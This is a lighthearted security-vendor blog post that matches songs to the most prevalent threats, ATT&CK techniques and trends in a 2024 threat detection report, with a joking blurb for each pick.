Skip Navigation
Get a Demo
 
 
 
 
 
 
 
 

Liner notes

Threat sounds vol. 4: The 2024 Threat Detection Report playlist

We’re excited to press play on Threat sounds vol. 4, a playlist to accompany the 2024 Threat Detection Report. For the fourth year in a row, we picked a song for each of the most prevalent threats, trends, and ATT&CK® techniques Red Canary observed this past year. Read our liner notes below, and listen to the whole songs on Spotify!

Liner notes

Threat sounds vol. 4: The 2024 Threat Detection Report playlist

We’re excited to press play on Threat sounds vol. 4, a playlist to accompany the 2024 Threat Detection Report. For the fourth year in a row, we picked a song for each of the most prevalent threats, trends, and ATT&CK® techniques Red Canary observed this past year. Read our liner notes below, and listen to the whole songs on Spotify!

Side 1: Threats

1. Charcoal Stork

“Stork Bite” by Andy Thorn

Our most prevalent threat of the year is more notable for its sheer numbers than any novel capabilities, but this suspected pay-per-installer can certainly drop some biting payloads.

2. Impacket

“You Need to Calm Down” by Taylor Swift

Ranking second for the second year in a row, the Impacket library of Python classes showed no signs of calming down in 2023, with significant changes made to its code repository.

3. Mimikatz

“Cat’s in the Cradle” by Harry Chapin

When Mimikatz is in the cradle, no set of credentials is safe.

4. Yellow Cockatoo

“good 4 u” by Olivia Rodrigo

Named by Red Canary in 2020, Yellow Cockatoo looked a little too happy and healthy in 2023, cracking our monthly top 10 six times.

5. SocGholish

“Java Jive” by The Ink Spots

SocGholish loves the java jive–malicious JavaScript in its drive-by downloads, to be exact.

6. ChromeLoader

“Fancy Footwork” by Chromeo

Like the members of Chromeo, ChromeLoader and its suspected delivery affiliate Charcoal Stork make for a dynamic duo.

7. Gamarue 

“Birds Vs Worms” by Modest Mouse

Since Gamarue has been around for so long, we went with this appropriately titled Modest Mouse deep cut.

8.  Qbot

 “Linger” by The Cranberries

Last summer’s much-hyped Qbot takedown appeared to only last for a few weeks. Do you have to let it linger, Qbot affiliates? Do you have to?

9.  Raspberry Robin

“Rockin’ Robin” by Bobby Day

As Raspberry Robin is often spread via USB drives, here’s an oldie for the boomers who still use those.

10. SmashJacker

“All Star” by Smash Mouth

SomeBODY once told us our browser was gonna roll us, unless we adopt better allowlist policies.

Side 2: Techniques

 

1.PowerShell (T1059.001)

“My Power” by Beyoncé and friends

Only Queen Bey is powerful enough to represent our most prevalent ATT&CK technique of the year, commanding some featured artists as well.

2. Windows Command Shell (T1059.003)

“Shell Shocked” by Juicy J, Wiz Khalifa, Ty Dolla $ign and others

This song from the “Teenage Mutant Ninja Turtles” soundtrack evokes how defenders can get “Shell Shocked” after discovering malicious use of cmd.exe.

3. Windows Management Instrumentation (T1047)

“Side to Side” by Ariana Grande

Given the lateral movement it enables, Windows Management Instrumentation (WMI) has got us walking side to side.

4. Cloud Accounts (T1078.004)

“Cloudbursting” by Kate Bush

Adversaries burst into cloud environments by creating highly permissioned accounts on a whim, often with the help of short-term tokens or API keys.

5. Obfuscated Files or Information (T1027)

“Hide and Seek” by Imogen Heap

Mmm whatcha say? Adversaries hide malicious code from signature-based detection tools with Base64 encoding, string concatenation, and other forms of obfuscation.

6. Email Forwarding Rule (T1114.003)

“emails I can’t send” by Sabrina Carpenter

Turns out Sabrina can’t send these emails because they’ve been moved to the RSS-Subscription folder.

7. OS Credential Dumping (T1003)

“Song for the Dumped” by Ben Folds Five

It’s not you, it’s Mimikatz.

8. Rundll32 (T1218.011) 

“Born to Run” by Bruce Springsteen

Sprung from cages in System32—DLLs like us, baby we were born to run.

9. Ingress Tool Transfer (T1105)

“Transfer Affection” by Flock of Seagulls

What can we say, we have a thing for bands with bird names.

10. Rename System Utilities (T1036.003) 

“What’s My Name?” by Rihanna, featuring Drake

We can imagine adversaries humming this when deciding what to rename the system utilities they’re abusing. RiRi.exe would probably not blend in very well.

Featured: Installer Packages (T1546.016)

“The Grand Parade of Lifeless Packaging” by Genesis

While they might appear lifeless, MSIX packages are prime delivery vehicles for malicious fake installers.

Featured: Kernel Modules and Extensions (T1547.006)

“Everybody Hates Linux” by Linux

We don’t hate Linux, not at all! But we understand the frustration around trying to secure the kernel might lead you to say so.

Featured: Escape to Host (T1611)

“The Sweet Escape” by Gwen Stefani and Akon

Escaping from a Linux container to its host must be quite a rush, enough for us to let out a Millennial whoop with Akon.

Featured: Reflective Code Loading (T1620)

Mirrors” by Justin Timberlake

Adversaries leverage reflective code loading to avoid writing their payload to disk (or so they believe) and thus evading defensive controls like Justin Timberlake avoids Britney Spears fans.

Featured: AppleScript (T1509.002)

“Unwritten” by Natasha Beddingfield

Just like MTV’s “reality” show “The Hills,” much adversary activity on macOS is scripted. The rest? Still unwritten.

Bonus tracks: Trends

 

Ransomware

“Criminal” by Fiona Apple

What you need is a good defense–against ransomware precursors that is.

Initial access tradecraft

“Wolfman’s Brother” by Phish

Like certain types of multi-factor authentication (MFA), the editors of this report are known to be Phish-resistant. But this year we relented after discovering a Phish song under five minutes long.

Identity attacks

“It Wasn’t Me” by Shaggy, featuring Rik Rok

If you spot nefarious activity coming from one of your employees’ accounts, rule out an identity compromise before pointing fingers. Their denials are likely more credible than Shaggy’s.

Vulnerabilities 

“I Like to Move it” by Reel 2 Reel

While new CVEs like the MOVEit zero day made headlines, adversaries exploited plenty of years-old (maybe less catchy) vulnerabilities throughout 2023 as well.

Stealers 

“Jolene” by Dolly Parton

RedLine, RedLine, RedLiiiine: We’re begging you to not take our creds.

Remote monitoring and management (RMM) tools

“Scattered” by Green Day

No adversary made better use of remote monitoring and management (RMM) tools in 2023 than SCATTERED SPIDER; we hope to say Good Riddance to them in 2024.

API abuse in the cloud 

“Just a Cloud Away” by Pharrell Williams

Once they access the API, adversaries are just a cloud away from your organization’s crown jewels.

Artificial intelligence (AI)

“Now and Then” by The Beatles

Among the things we have artificial intelligence (AI) to thank for in 2023: The release of a long lost Beatles song, new detection and response technologies, and a steady drip of existential dread.

Adversary emulation and testing 

“Testing 1, 2, 3” by Barenaked Ladies

Long live ART. Long live BNL.

Industry and sector analysis 

“INDUSTRY BABY” by Lil Nas X featuring Jack Harlow

Does Lil Nas X make country music? Rap? Pop for the terminally online? We faced similar dilemmas when trying to accurately categorize our customers in our industry analysis.

 
 
Back to Top